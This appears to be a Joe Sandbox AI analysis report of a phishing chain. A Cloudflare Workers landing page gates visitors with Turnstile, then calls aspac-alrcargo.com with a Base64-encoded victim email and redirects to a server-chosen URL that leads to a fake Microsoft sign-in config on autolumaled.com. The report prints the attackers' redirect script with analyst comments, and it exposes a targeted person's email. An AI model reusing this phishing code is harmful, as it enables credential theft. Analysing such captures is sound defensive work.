URL: https://google.com.vn Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false,
"reasoning": "This is a legitimate Google domain for Vietnam (.vn). Google maintains country-specific domains, and .vn is the official top-level domain for Vietnam."
} |
URL: https://google.com.vn |
URL: https://3a84bd6a.82e4c7deb867f162b7c6c8d3.workers.... Model: Joe Sandbox AI | {
"risk_score": 5,
"reasoning": "The script contains a mix of behaviors, some of which are low-risk (e.g., CAPTCHA handling) and others that require further review (e.g., encrypted user agent data transmission). The overall risk is in the medium range, and the script should be analyzed more closely to determine the full extent of its functionality and potential impact."
} |
/**
 * Turnstile success callback for the captured landing page.
 *
 * Analyst note: the only check is client-side and purely structural: a truthy
 * value whose `length` exceeds 10. The token is not passed on to
 * `sendRequest()`, so in the visible code the CAPTCHA acts as a gate in front
 * of the next request rather than as something the backend is shown to verify.
 *
 * @param {string} response - Token handed over by the Turnstile widget.
 */
var verifyCallback_CF = function (response) {
  const tokenLooksPresent = Boolean(response) && response.length > 10;
  if (!tokenLooksPresent) {
    return;
  }
  // Reached only once the widget reports a solved challenge.
  sendRequest();
};
/**
 * Hook invoked once the Turnstile script has loaded; renders the widget into
 * the `#turnstileCaptcha` element and wires its success callback.
 *
 * Analyst note: the sitekey below is the same value that appears as
 * `chlApiSitekey` in the Cloudflare challenge configuration captured further
 * down this report, which ties the widget traffic to this landing page.
 */
window.onloadTurnstileCallback = function () {
  const widgetOptions = {
    sitekey: "0x4AAAAAAA5Vi5ptLVedHwH9",
    callback: verifyCallback_CF,
  };
  turnstile.render("#turnstileCaptcha", widgetOptions);
};
/**
 * Caesar-shift decoder: moves every ASCII letter back by `shift` positions
 * within its own case and leaves all other characters untouched.
 *
 * Analyst note: nothing in the visible capture calls this helper. The modulo
 * is applied after adding a single 26, so a shift larger than 26 produces a
 * negative remainder and therefore a non-letter character.
 *
 * @param {string} encryptedText - Text to decode.
 * @param {number} shift - Number of alphabet positions to rotate back.
 * @returns {string} The decoded text.
 */
function hh2(encryptedText, shift) {
  const pieces = [];
  for (let idx = 0; idx < encryptedText.length; idx += 1) {
    const unit = encryptedText.charCodeAt(idx);

    // Pick the alphabet base for 'A'-'Z' or 'a'-'z'; anything else passes through.
    let base = null;
    if (unit >= 65 && unit <= 90) {
      base = 65;
    } else if (unit >= 97 && unit <= 122) {
      base = 97;
    }

    if (base === null) {
      pieces.push(encryptedText[idx]);
    } else {
      pieces.push(String.fromCharCode(((unit - base - shift + 26) % 26) + base));
    }
  }
  return pieces.join("");
}
/**
 * Placeholder "encryption" routine.
 *
 * Analyst note: despite its name this function performs no cryptographic
 * operation. It logs the key it was given and returns the input unchanged, so
 * every value passed through it leaves the browser in plaintext.
 *
 * @param {string} text - Value to be "encrypted".
 * @param {string} publicKey - PEM public key; only written to the console.
 * @returns {string} `text`, unmodified.
 */
function Encrypt(text, publicKey) {
  const logLabel = 'encrypt with public key:';
  console.log(logLabel, publicKey);
  return text;
}
// Analyst note: hard-coded endpoint that sendRequest() queries once the CAPTCHA
// callback fires. The `qrc` value is Base64 and decodes to an e-mail address;
// the same address appears URL-encoded as `login_hint` in the $Config capture
// later in this report, so the parameter presumably identifies the targeted
// recipient. Both the host and the `qrc` parameter name are usable as
// indicators when hunting in proxy or DNS logs.
let sx = "https://aspac-alrcargo.com/?eawkysbj&qrc=bWlzdHkuYWxuYWhhb2lAdGV4YW5hY2VudGVyLmNvbQ==";
// Analyst note: PEM-armoured public key embedded in the page. In this capture it
// is only handed to Encrypt(), which logs it and returns its input unchanged,
// so the key is never used for an actual encryption in the visible code.
const PUBLIC_KEY = `-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxCJBwcY8t0AqPquU+Ah1
R0EPWlcD5XSXhOEe00844TkiGLFHnMWQEugh0zYh/kgrw8hv1ifOmf4Jrkis3tlW
qpIO2U9Nle23D1VKpxZSxRyYTbnoyq3lRcqY5txOJKdviR9fA9wPidS6KTXhX2xq
wq1jjYvgHtntEGYwK6Lzm6Q8jTjfV7ICqnV74GTKnPN7VMDKsS2+Dcf2Y2IoYY1o
NM7nWPKFeVUmkqFMowkdBmGJHL4UqRcxbhiRX3AAzzdQvbQg7OQxYjbKak23IvDN
1ia9SsXQyo5H/XnfXB2Nb9sNayO5sV+hDmBRlujtm1+maqGMJUXZeVHL81Q7O22a
WQIDAQAB
-----END PUBLIC KEY-----`;
/**
 * Fetches the next-stage instruction from the endpoint in `sx` and acts on it.
 *
 * Analyst notes:
 *  - The browser's user-agent string is sent in a custom `qrc-auth` request
 *    header. Because `Encrypt()` returns its input unchanged, the header holds
 *    the user-agent in plaintext even though the log message says "encrypted".
 *  - The JSON reply decides what happens next: a `url` field triggers a
 *    top-level navigation to a server-chosen location; otherwise the reply's
 *    `error` text (or a fixed string) replaces the page body via `innerHTML`.
 *  - The `qrc-auth` header name is a stable string in this capture and can be
 *    matched in proxy logs alongside the host in `sx`.
 */
function sendRequest() {
  const headerValue = Encrypt(navigator.userAgent, PUBLIC_KEY);
  console.log('Sending request with encrypted user-agent:', headerValue);

  const req = new XMLHttpRequest();
  req.open('GET', sx, true);
  req.setRequestHeader("accept", "application/json");
  req.setRequestHeader("qrc-auth", headerValue);

  req.onreadystatechange = function () {
    if (req.readyState !== XMLHttpRequest.DONE) {
      return;
    }
    if (req.status !== 200) {
      document.body.innerHTML = 'CONNECTION TO HOST FAILED';
      return;
    }

    const reply = JSON.parse(req.responseText);
    if (reply.url) {
      // Destination comes entirely from the remote reply.
      window.location = reply.url;
      return;
    }
    document.body.innerHTML = reply.error ? reply.error : 'ACCESS DENIED';
  };

  req.send();
}
|
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a legitimate and common practice for web security. The script sets up various configuration options for the Cloudflare challenge and handles communication between the parent window and the challenge widget. While it uses some dynamic behavior, such as `postMessage()` and event listeners, the overall intent seems to be for a legitimate security challenge rather than malicious activity. Therefore, the risk score is assessed as low."
} |
// Challenge-iframe bootstrap as captured from challenges.cloudflare.com: it
// publishes the per-widget configuration on window._cf_chl_opt and registers a
// message listener that answers probes from the embedding page.
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'kbzhd',
// Same sitekey as the one passed to turnstile.render() on the landing page
// captured earlier in this report.
chlApiSitekey: '0x4AAAAAAA5Vi5ptLVedHwH9',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'TUuYPEmTGsdbpIgNhMQNZb_rY55qJpp6Kbroaz4uK8M-1736976828-1.3.1.1-qVDRcaAvXxcSu.0h02zPjB_fpd6mUDJgcLMrb1us7zQ',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '9028fc7bbc8742f7',
cH: '330o0BA3NzJOYLQkQNRkU8MPAY01ciHNyYKgLYrodX4-1736976828-1.1.1.1-DtaUrylRSmcIK2ogcg8Tcsix2C7cnLnAsJBjThR3fz84ljl1.bBLbcy3hzazKXI8',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
// Opaque token blob; its meaning is not visible from this snippet.
md: '9fcvCDlOfYJDy8xn3DgYvy2H.Jclsw7Bk399ABhndJE-1736976828-1.1.1.1-D_fJP4kldRuEoHnrvC9Vt_t9goxaQ3.IX6zBu1qTSFRtsG5gefaLYQcbJVII6935apaD1HtyGdVnVsYWa1XM.Lvvk14vyY8Nddz2fzP6CYOhc4j4lSWW2rSy_q9hPOrOSyTxx.tCjEYyIa6mBbOB.nBpXd.JnhodRhe0zqCg5SLMqo5DZ0g4QksOMkHFEDHPaDJG1gSsC3Ocmhr4zsrPBoleuP8G5LztuubIsq6oE94gBVj_YkObZF_0m3B7HtKC47XpCjNgHp3VosYGsgAtTugPME006atW3iZlWcuCN54wdl0j070Wkgv4wIShMz3HQOT_laCmlEJX7WP66hNlTz2Jv..CuvHcUXHz2PtN1pbCG6z3SQf9M_JoQCO4ed.DOKL0k.t3RMPBW3CDuVxBYDBkCv9_YpvfFAdMkE_quL6KbHbfRfy0zKrlW3UNrr_aDpt3tP1n8OEnLAGB.keWn7y28SXvLbj04VimS8kvEEBv_bZqRX_73hTKRxdJ1JpHHBqL97fbkrq11uV5xlLDLe2AURPNMzZIGw2yMvmZ_pqPlkxCo.eoVsng1JbxdWvbC9kjwgQQ_H76snipDxkJAKlsh60dLL2MivXvEi_13SPtE6.MaGQwmdUWo.nux6ialstS9sGH7uUl9vUT6kYnnngIq7Kq69XSFWzeI8AaNjXxXYj7Q3Uci75FiODvtDSpgddHtIsB81iIsdP7RBLDginupBlJ64V3JVDlMQyuNZ2L3Mpy0a6a2xAvCme0zZZ.Uhb00vSUUpur8QaJwN93W.eWr6mWD3oMRCclQ55SVa1P17RZgXMeVJOTxGeLMq3eN_Dk3J9nwDy6jmEylGTrHbCwnwpRYdYo24zNRZ3L0t.BXgvHO0kBr9lvigjghnf61NVEzz0cODInLnfw753ia8Jh8CDTRvYvETm8wGzxksPOFH7rxVSTWTcz8eYT8HQ6eWXE2gBxj1DyxAvjL87KlSXx6VFqRyPNX1T_3Cgmwdh7Lq6e_ihB7zVQf4MqFZibLnEIy2VFK0Mn6UsE5iHs4JE70mRLeGlbhqCtKQJC1u5nvUYjXXQ3JlaWPWFZXFCd6cCKntdTDof971t61kyOqt2icON5Lzy10jjlb6bp1IdVSIkO5TvPEbBmS33ZTNamgNCKCkp1EQyJCiKGvrB4a132uZr0.cdFMX41Vk1DsX0hHYyJzLEqlQctN9aO.FIklDb4HxWKdyT2V685yKfj1reVtADAnAXR8rCnEdcEjqQ2to4ItTlwn63KBEyCetMYWqPRMfizIJC1I1Fg9DLKQ_sNjIXnfbVFTf1XtIFOg3jU3CWXcPENF_caFX4VOkDtCYDfE1SkrLyVDpzjYOlf8MLbVKi8rMKONIU2jBx1pMWDA2c3SBQ1NUi06JR92DQ9gEDv1gEUNAtpScgG2M3FfK89iwr6GoNDXwrNQxQAV9Q',
cITimeS: '1736976828',
// Asks the embedding page to reload the widget.
// NOTE(review): the targetOrigin argument is "*", so the message (including
// nextRcV) is delivered to whichever page is the parent frame.
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'kbzhd',
nextRcV: 'TUuYPEmTGsdbpIgNhMQNZb_rY55qJpp6Kbroaz4uK8M-1736976828-1.3.1.1-qVDRcaAvXxcSu.0h02zPjB_fpd6mUDJgcLMrb1us7zQ',
event: 'reloadRequest',
}, "*");
}
}
};
// Answers a 'meow' probe that carries this widget's id with a 'food' message
// echoing the probe's seq value.
// NOTE(review): the filter looks only at fields of event.data; event.origin is
// not inspected in the visible code, and the reply again uses a "*" target.
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other automated threats. The script does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or obfuscated code. It primarily handles the Cloudflare challenge functionality, including translations, polyfills, and other related operations. While the script uses some moderate-risk indicators like external data transmission and aggressive DOM manipulation, these are likely necessary for the Cloudflare challenge to function properly. Additionally, the script is interacting with known, reputable Cloudflare domains, which reduces the overall risk. Therefore, the final risk score is assessed as 3, indicating a low-risk script."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"testing_only":"Testing%20only.","turnstile_footer_privacy":"Privacy","turnstile_failure":"Error","turnstile_feedback_report":"Having%20trouble%3F","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_refresh":"Refresh","turnstile_verifying":"Verifying...","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_expired":"Expired","human_button_text":"Verify%20you%20are%20human","turnstile_timeout":"Timed%20out","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_feedback_description":"Send%20Feedback","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_overrun_description":"Stuck%20here%3F","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_success":"Success%21","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%2
0time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_footer_terms":"Terms"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eT,eU,fk,fl,fp,fq,fr,fu,fx,fz,fA,fB,fN,fZ,g5,g6,g7,gh,gs,gw,gD,gH,eR,eS){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1783))/1*(-parseInt(gI(731))/2)+-parseInt(gI(1472))/3*(-parseInt(gI(1717))/4)+parseInt(gI(705))/5*(parseInt(gI(559))/6)+-parseInt(gI(1147))/7*(-parseInt(gI(1706))/8)+parseInt(gI(555))/9*(parseInt(gI(1004))/10)+-parseInt(gI(913))/11*(-parseInt(gI(666))/12)+-parseInt(gI(1299))/13,f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,101272),eM=this||self,eN=eM[gJ(572)],eM[gJ(588)]=function(c,gU,e){e=(gU=gJ,{'nFDvz':function(g,h){return g(h)},'gkOBu':gU(1193)});try{return e[gU(1754)](eQ,c)}catch(g){if(e[gU(1563)]!==e[gU(1563)])g[gU(1095)][gU(1583)]();else return eO(e[gU(1754)](eP,c))}},eR=[],eS=0;256>eS;eR[eS]=String[gJ(1403)](eS),eS++);gH=(eT=(0,eval)(gJ(1461)),eU=atob(gJ(799)),fk={},fk[gJ(1696)]='o',fk[gJ(636)]='s',fk[gJ(632)]='u',fk[gJ(658)]='z',fk[gJ(994)]='n',fk[gJ(810)]='I',fk[gJ(717)]='b',fl=fk,eM[gJ(552)]=function(g,h,i,j,hw,o,x,B,C,D,E,F,H,I,J){if(hw=gJ,o={'IQKCq':function(G,H){return G===H},'tnOhg':function(G,H){return G+H},'CPXmn':function(G,H){return G^H},'JEQiw':function(G,H){return H^G},'epDMP':function(G,H){return G(H)},'pMWBt':function(G,H){return G<H},'oWjIC':hw(660),'GLrIU':function(G,H,I){return G(H,I)},'LftWn':function(G,H,I){return G(H,I)},'KyyCz':function(G,H){return G+H}},null===h||h===void 0)return j;for(x=o[hw(1740)](fo,h),g[hw(817)][hw(585)]&&(x=x[hw(1176)](g[hw(817)][hw(585)](h))),x=g[hw(1816)][hw(1434)]&&g[hw(1530)]?g[hw(1816)][hw(1434)](new 
g[(hw(1530))](x)):function(G,hy,H){for(hy=hw,G[hy(1468)](),H=0;H<G[hy(837)];o[hy(569)](G[H], |
URL: https://3a84bd6a.82e4c7deb867f162b7c6c8d3.workers.dev/?qrc=bWlzdHkuYWxuYWhhb2lAdGV4YW5hY2VudGVyLmNvbQ== Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Please stand by, while we are checking if the site connection is secure\nWe need to review the security of your connection before proceeding.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://3a84bd6a.82e4c7deb867f162b7c6c8d3.workers.dev/?qrc=bWlzdHkuYWxuYWhhb2lAdGV4YW5hY2VudGVyLmNvbQ== Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://3a84bd6a.82e4c7deb867f162b7c6c8d3.workers.dev/?qrc=bWlzdHkuYWxuYWhhb2lAdGV4YW5hY2VudGVyLmNvbQ== Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
URL: https://3a84bd6a.82e4c7deb867f162b7c6c8d3.workers.dev Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": true,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true,
"reasoning": "This URL uses Cloudflare Workers (.workers.dev domain), which is a legitimate service but can be misused. The long hexadecimal-like subdomain (3a84bd6a.82e4c7deb867f162b7c6c8d3) is suspicious and could be dynamically generated. Third-party hosting through Cloudflare Workers indicates potential for abuse."
} |
URL: https://3a84bd6a.82e4c7deb867f162b7c6c8d3.workers.dev |
URL: https://3a84bd6a.82e4c7deb867f162b7c6c8d3.workers.dev/?qrc=bWlzdHkuYWxuYWhhb2lAdGV4YW5hY2VudGVyLmNvbQ== Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
URL: https://challenges.cloudflare.com/turnstile/v0/b/e... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The script contains obfuscated code, which is a high-risk indicator. However, there are no clear signs of malicious behavior such as data exfiltration or dynamic code execution. The obfuscation could be for legitimate purposes like protecting intellectual property."
} |
"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Ar(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function Bt(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function qt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return 
o}function zt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Gt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. 
Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
URL: https://autolumaled.com/?2ryn4nn79=aHR0cHM6Ly9sb2d... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script demonstrates several high-risk behaviors, including data exfiltration and potential redirection to an untrusted domain. The script checks if it is running in an iframe and, if not allowed, attempts to redirect the top-level window to a URL containing an 'iframe-request-id' parameter. This behavior could be used for phishing or other malicious purposes, and the use of obfuscated code and unknown domains increases the risk."
} |
//<![CDATA[
/*
 * Frame-handling stub from the captured sign-in page.
 *
 * Analyst note: in this capture the outer condition is the literal `true`, so
 * only the first branch runs (the body is made visible). The branch that would
 * rewrite the top-level window's location with an `iframe-request-id`
 * parameter is unreachable as written.
 */
!function () {
  const win = window;
  const doc = win.document;
  const config = win.$Config || {};

  // Rebuilds the current URL with iframe-request-id inserted ahead of any fragment.
  const buildRedirectUrl = function () {
    const href = win.self.location.href;
    const hashAt = href.indexOf("#");
    const hasHash = hashAt !== -1;
    const queryAt = href.indexOf("?");
    const cut = hasHash ? hashAt : href.length;
    const separator = queryAt === -1 || (hasHash && queryAt > hashAt) ? "?" : "&";
    return href.substr(0, cut) + separator + "iframe-request-id=" + config.sessionId + href.substr(cut);
  };

  if (true) {
    if (doc && doc.body) {
      doc.body.style.display = "block";
    }
  } else if (!config.allowFrame) {
    if (config.fAddTryCatchForIFrameRedirects) {
      try {
        win.top.location = buildRedirectUrl();
      } catch (ignored) {}
    } else {
      win.top.location = buildRedirectUrl();
    }
  }
}();
//
|
URL: https://autolumaled.com/?2ryn4nn79=aHR0cHM6Ly9sb2d... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script appears to be a configuration object for a web application, but it contains some concerning behaviors that require further investigation. The script interacts with external domains like 'autolumaled.com' and 'login.live.com', which could potentially be used for data exfiltration or other malicious activities. Additionally, the script includes a large amount of obfuscated data, which is a common tactic used to hide malicious code. While the script may have legitimate purposes, the combination of external data transmission and obfuscation warrants a medium-risk score for further review."
} |
//<![CDATA[
$Config={"fShowPersistentCookiesWarning":false,"urlMsaSignUp":"https://autolumaled.com/owa/","urlMsaLogout":"https://login.live.com/logout.srf?iframed_by=https%3a%2f%2fautolumaled.com","urlOtherIdpForget":"https://login.live.com/forgetme.srf?iframed_by=https%3a%2f%2fautolumaled.com","showCantAccessAccountLink":true,"urlGitHubFed":"https://autolumaled.com/owa/?idp_hint=github.com","arrExternalTrustedRealmFederatedIdps":[],"fShowSignInWithGitHubOnlyOnCredPicker":true,"fEnableShowResendCode":true,"iShowResendCodeDelay":90000,"sSMSCtryPhoneData":"AF~Afghanistan~93!!!AX~land Islands~358!!!AL~Albania~355!!!DZ~Algeria~213!!!AS~American Samoa~1!!!AD~Andorra~376!!!AO~Angola~244!!!AI~Anguilla~1!!!AG~Antigua and Barbuda~1!!!AR~Argentina~54!!!AM~Armenia~374!!!AW~Aruba~297!!!AC~Ascension Island~247!!!AU~Australia~61!!!AT~Austria~43!!!AZ~Azerbaijan~994!!!BS~Bahamas~1!!!BH~Bahrain~973!!!BD~Bangladesh~880!!!BB~Barbados~1!!!BY~Belarus~375!!!BE~Belgium~32!!!BZ~Belize~501!!!BJ~Benin~229!!!BM~Bermuda~1!!!BT~Bhutan~975!!!BO~Bolivia~591!!!BQ~Bonaire~599!!!BA~Bosnia and Herzegovina~387!!!BW~Botswana~267!!!BR~Brazil~55!!!IO~British Indian Ocean Territory~246!!!VG~British Virgin Islands~1!!!BN~Brunei~673!!!BG~Bulgaria~359!!!BF~Burkina Faso~226!!!BI~Burundi~257!!!CV~Cabo Verde~238!!!KH~Cambodia~855!!!CM~Cameroon~237!!!CA~Canada~1!!!KY~Cayman Islands~1!!!CF~Central African Republic~236!!!TD~Chad~235!!!CL~Chile~56!!!CN~China~86!!!CX~Christmas Island~61!!!CC~Cocos (Keeling) Islands~61!!!CO~Colombia~57!!!KM~Comoros~269!!!CG~Congo~242!!!CD~Congo (DRC)~243!!!CK~Cook Islands~682!!!CR~Costa Rica~506!!!CI~Cte d\u0027Ivoire~225!!!HR~Croatia~385!!!CU~Cuba~53!!!CW~Curaao~599!!!CY~Cyprus~357!!!CZ~Czechia~420!!!DK~Denmark~45!!!DJ~Djibouti~253!!!DM~Dominica~1!!!DO~Dominican Republic~1!!!EC~Ecuador~593!!!EG~Egypt~20!!!SV~El Salvador~503!!!GQ~Equatorial Guinea~240!!!ER~Eritrea~291!!!EE~Estonia~372!!!ET~Ethiopia~251!!!FK~Falkland Islands~500!!!FO~Faroe 
Islands~298!!!FJ~Fiji~679!!!FI~Finland~358!!!FR~France~33!!!GF~French Guiana~594!!!PF~French Polynesia~689!!!GA~Gabon~241!!!GM~Gambia~220!!!GE~Georgia~995!!!DE~Germany~49!!!GH~Ghana~233!!!GI~Gibraltar~350!!!GR~Greece~30!!!GL~Greenland~299!!!GD~Grenada~1!!!GP~Guadeloupe~590!!!GU~Guam~1!!!GT~Guatemala~502!!!GG~Guernsey~44!!!GN~Guinea~224!!!GW~Guinea-Bissau~245!!!GY~Guyana~592!!!HT~Haiti~509!!!HN~Honduras~504!!!HK~Hong Kong SAR~852!!!HU~Hungary~36!!!IS~Iceland~354!!!IN~India~91!!!ID~Indonesia~62!!!IR~Iran~98!!!IQ~Iraq~964!!!IE~Ireland~353!!!IM~Isle of Man~44!!!IL~Israel~972!!!IT~Italy~39!!!JM~Jamaica~1!!!JP~Japan~81!!!JE~Jersey~44!!!JO~Jordan~962!!!KZ~Kazakhstan~7!!!KE~Kenya~254!!!KI~Kiribati~686!!!KR~Korea~82!!!KW~Kuwait~965!!!KG~Kyrgyzstan~996!!!LA~Laos~856!!!LV~Latvia~371!!!LB~Lebanon~961!!!LS~Lesotho~266!!!LR~Liberia~231!!!LY~Libya~218!!!LI~Liechtenstein~423!!!LT~Lithuania~370!!!LU~Luxembourg~352!!!MO~Macao SAR~853!!!MG~Madagascar~261!!!MW~Malawi~265!!!MY~Malaysia~60!!!MV~Maldives~960!!!ML~Mali~223!!!MT~Malta~356!!!MH~Marshall 